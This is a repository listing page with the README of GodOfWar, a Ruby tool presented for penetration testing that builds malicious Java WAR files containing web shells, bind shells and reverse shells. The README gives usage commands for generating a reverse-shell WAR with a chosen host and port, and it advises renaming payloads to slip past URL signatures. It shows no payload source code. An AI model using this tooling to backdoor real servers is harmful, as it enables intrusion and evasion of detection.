All Projects โ†’ KINGSABRI โ†’ godofwar

KINGSABRI / godofwar

Licence: other
GodOfWar - Malicious Java WAR builder with built-in payloads

Programming Languages

java
68154 projects - #9 most used programming language
ruby
36898 projects - #4 most used programming language
CSS
56736 projects

Projects that are alternatives of or similar to godofwar

Bytecode Viewer
A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More)
Stars: โœญ 12,606 (+10583.05%)
Mutual labels:  jsp, war
ketabhome-shopping-cart-admin-panel
๐Ÿ›’ ๐Ÿ“™ ๐Ÿ“” ketabhome is an online java book store application with admin panel based on servlet, with database c3p0 connector
Stars: โœญ 19 (-83.9%)
Mutual labels:  jsp, tomcat
Uranus
Hierarchical Memo & Task Web-App
Stars: โœญ 71 (-39.83%)
Mutual labels:  jsp, tomcat
ansible-war-deploy
A playbook to deploy a WAR on Tomcat & restart it.
Stars: โœญ 20 (-83.05%)
Mutual labels:  tomcat, war
gtfo
Search for Unix binaries that can be exploited to bypass system security restrictions.
Stars: โœญ 88 (-25.42%)
Mutual labels:  reverse-shell, bind-shell
Javaweb Project Source Share
๐ŸŒฑ๐Ÿš€ๅˆ†ไบซๅŸบไบŽServletใ€SSHใ€SSMใ€SpringBoot็ญ‰ๆต่กŒๆŠ€ๆœฏๅฎž็Žฐ็š„JavaWeb้กน็›ฎ๏ผŒ้šพๅบฆๅˆ†ไธบ5ไธช็ญ‰็บง๏ผŒๅธฎๅŠฉๅฐ็™ฝๅ…ฅ้—จJavaWebๅผ€ๅ‘๏ผŒๅๅŠฉJavaWebๅผ€ๅ‘่€…็†Ÿๆ‚‰ๆœ€ๆ–ฐๆŠ€ๆœฏ
Stars: โœญ 229 (+94.07%)
Mutual labels:  jsp, tomcat
Hotelsystem
๐ŸจTopViewๅทฅไฝœๅฎคไธ€่ฝฎ่€ƒๆ ธ้กน็›ฎ๏ผšไธ€ไธช้…’ๅบ—็ฎก็†็ณป็ปŸ๏ผŒๆไพ›ๆŸฅ็œ‹ๆˆฟ้—ด๏ผŒๅฏนๆˆฟ้—ด่ฟ›่กŒๆจก็ณŠๆŸฅ่ฏข๏ผŒ้ข„่ฎขๆˆฟ้—ด๏ผŒไธชไบบไฟกๆฏ็ฎก็†๏ผŒๆˆฟ้—ดๅ’Œ้…’ๅบ—ไฟกๆฏ็ฎก็†(็ฎก็†ๅ‘˜)็ญ‰ๅŠŸ่ƒฝ๏ผŒๅŽๅฐไฝฟ็”จJava,tomcat,mysql,servlet,jspๅฎž็Žฐ๏ผŒๆฒกๆœ‰ไฝฟ็”จไปปไฝ•ๆก†ๆžถ
Stars: โœญ 78 (-33.9%)
Mutual labels:  jsp, tomcat
java-reverse-tcp
JAR, Java, and JSP shells that work on Linux OS, macOS, and Windows OS.
Stars: โœญ 19 (-83.9%)
Mutual labels:  reverse-shell, bind-shell
Gtfobins.github.io
GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems
Stars: โœญ 6,030 (+5010.17%)
Mutual labels:  reverse-shell, bind-shell
penelope
Penelope Shell Handler
Stars: โœญ 291 (+146.61%)
Mutual labels:  reverse-shell, bind-shell
bitnami-docker-tomcat
Bitnami Docker Image for Tomcat
Stars: โœญ 44 (-62.71%)
Mutual labels:  tomcat
HTTP-Reverse-Shell
An HTTP Reverse Shell in Python
Stars: โœญ 48 (-59.32%)
Mutual labels:  reverse-shell
BlueReverse
Bluetooth reverse shell.
Stars: โœญ 15 (-87.29%)
Mutual labels:  reverse-shell
devops-ninja
This is a collection of some very useful command-line commands that eases the life of a DevOps Engineer.
Stars: โœญ 27 (-77.12%)
Mutual labels:  tomcat
GodSpeed
Fast and intuitive manager for multiple reverse shells
Stars: โœญ 75 (-36.44%)
Mutual labels:  reverse-shell
Tomcat-Webmin-Module
Apache Tomcat Plugin for Webmin
Stars: โœญ 19 (-83.9%)
Mutual labels:  tomcat
Awsome-shells
Collection of reverse shells
Stars: โœญ 38 (-67.8%)
Mutual labels:  jsp
k0otkit
k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.
Stars: โœญ 217 (+83.9%)
Mutual labels:  reverse-shell
SiegeWar
A war plugin for Towny.
Stars: โœญ 43 (-63.56%)
Mutual labels:  war
inventory-hub-java-on-azure
Sample Inventory Hub App using Serverless and Event-driven Java - on Azure with Spring Boot, Tomcat, Functions, Event Hub and Cosmos DB
Stars: โœญ 18 (-84.75%)
Mutual labels:  tomcat

GodOfWar - Malicious Java WAR builder

A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby.

                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Malicious Java WAR builder.

Features

  • Preexisting payloads. (try -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Configurable backdoor. (try --host/--port)
  • Control over payload name.
    • To avoid malicious name after deployment to bypass URL name signatures.

Installation

$ gem install godofwar

Usage

$ godofwar -h 

Help menu:
   -p, --payload PAYLOAD            Generates war from one of the available payloads.
                                        (check -l/--list)
   -H, --host IP_ADDR               Local or Remote IP address for the chosen payload
                                        (used with -p/--payload)
   -P, --port PORT                  Local or Remote Port for the chosen payload
                                        (used with -p/--payload)
   -o, --output [FILE]              Output file and the deployment name.
                                        (default is the payload original name. check '-l/--list')
   -l, --list                       list all available payloads.
   -h, --help                       Show this help message.

Example

List all payloads

$ godofwar -l
โ”œโ”€โ”€ cmd_get
โ”‚   โ””โ”€โ”€ Information:
โ”‚       โ”œโ”€โ”€ Description: Command execution via web interface
โ”‚       โ”œโ”€โ”€ OS:          any
โ”‚       โ”œโ”€โ”€ Settings:    {"false"=>"No Settings required!"}
โ”‚       โ”œโ”€โ”€ Usage:       http://host/cmd.jsp?cmd=whoami
โ”‚       โ”œโ”€โ”€ References:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
โ”‚       โ””โ”€โ”€ Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
โ”œโ”€โ”€ filebrowser
โ”‚   โ””โ”€โ”€ Information:
โ”‚       โ”œโ”€โ”€ Description: Remote file browser, upload, download, unzip files and native command execution
โ”‚       โ”œโ”€โ”€ OS:          any
โ”‚       โ”œโ”€โ”€ Settings:    {"false"=>"No Settings required!"}
โ”‚       โ”œโ”€โ”€ Usage:       http://host/filebrowser.jsp
โ”‚       โ”œโ”€โ”€ References:  ["http://www.vonloesch.de/filebrowser.html"]
โ”‚       โ””โ”€โ”€ Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
โ”œโ”€โ”€ bind_shell
โ”‚   โ””โ”€โ”€ Information:
โ”‚       โ”œโ”€โ”€ Description: TCP bind shell
โ”‚       โ”œโ”€โ”€ OS:          any
โ”‚       โ”œโ”€โ”€ Settings:    {"port"=>4444, "false"=>"No Settings required!"}
โ”‚       โ”œโ”€โ”€ Usage:       http://host/reverse-shell.jsp
โ”‚       โ”œโ”€โ”€ References:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
โ”‚       โ””โ”€โ”€ Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
โ”œโ”€โ”€ reverse_shell_ui
โ”‚   โ””โ”€โ”€ Information:
โ”‚       โ”œโ”€โ”€ Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
โ”‚       โ”œโ”€โ”€ OS:          any
โ”‚       โ”œโ”€โ”€ Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
โ”‚       โ”œโ”€โ”€ Usage:       http://host/reverse_shell_ui.jsp
โ”‚       โ”œโ”€โ”€ References:  []
โ”‚       โ””โ”€โ”€ Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
โ”œโ”€โ”€ reverse_shell
โ”‚   โ””โ”€โ”€ Information:
โ”‚       โ”œโ”€โ”€ Description: TCP reverse shell. LHOST and LPORT are hardcoded
โ”‚       โ”œโ”€โ”€ OS:          any
โ”‚       โ”œโ”€โ”€ Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
โ”‚       โ”œโ”€โ”€ Usage:       http://host/reverse_shell.jsp
โ”‚       โ”œโ”€โ”€ References:  []
โ”‚       โ””โ”€โ”€ Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Generate payload with LHOST and LPORT

godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

After deployment, you can visit your shell on (http://host:8080/puppy/puppy.jsp)

Contributing

  1. Fork it ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Create your feature branch (git checkout -b my-new-feature).
  3. Commit your changes (git commit -am 'Add some feature').
  4. Push to the branch (git push origin my-new-feature).
  5. Create a new Pull Request.

Add More Backdoors

To contribute by adding more backdoors:

  1. create a new folder under payloads directory.
  2. put your jsp file under the newly created directory (make it the same directory name).
  3. update payloads_info.json file with
    1. description.
    2. supported operating system (try to make it universal though).
    3. configurations: default host and port.
    4. references: the payload origin or its creator credits.

License

The gem is available as open source under the terms of the MIT License.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].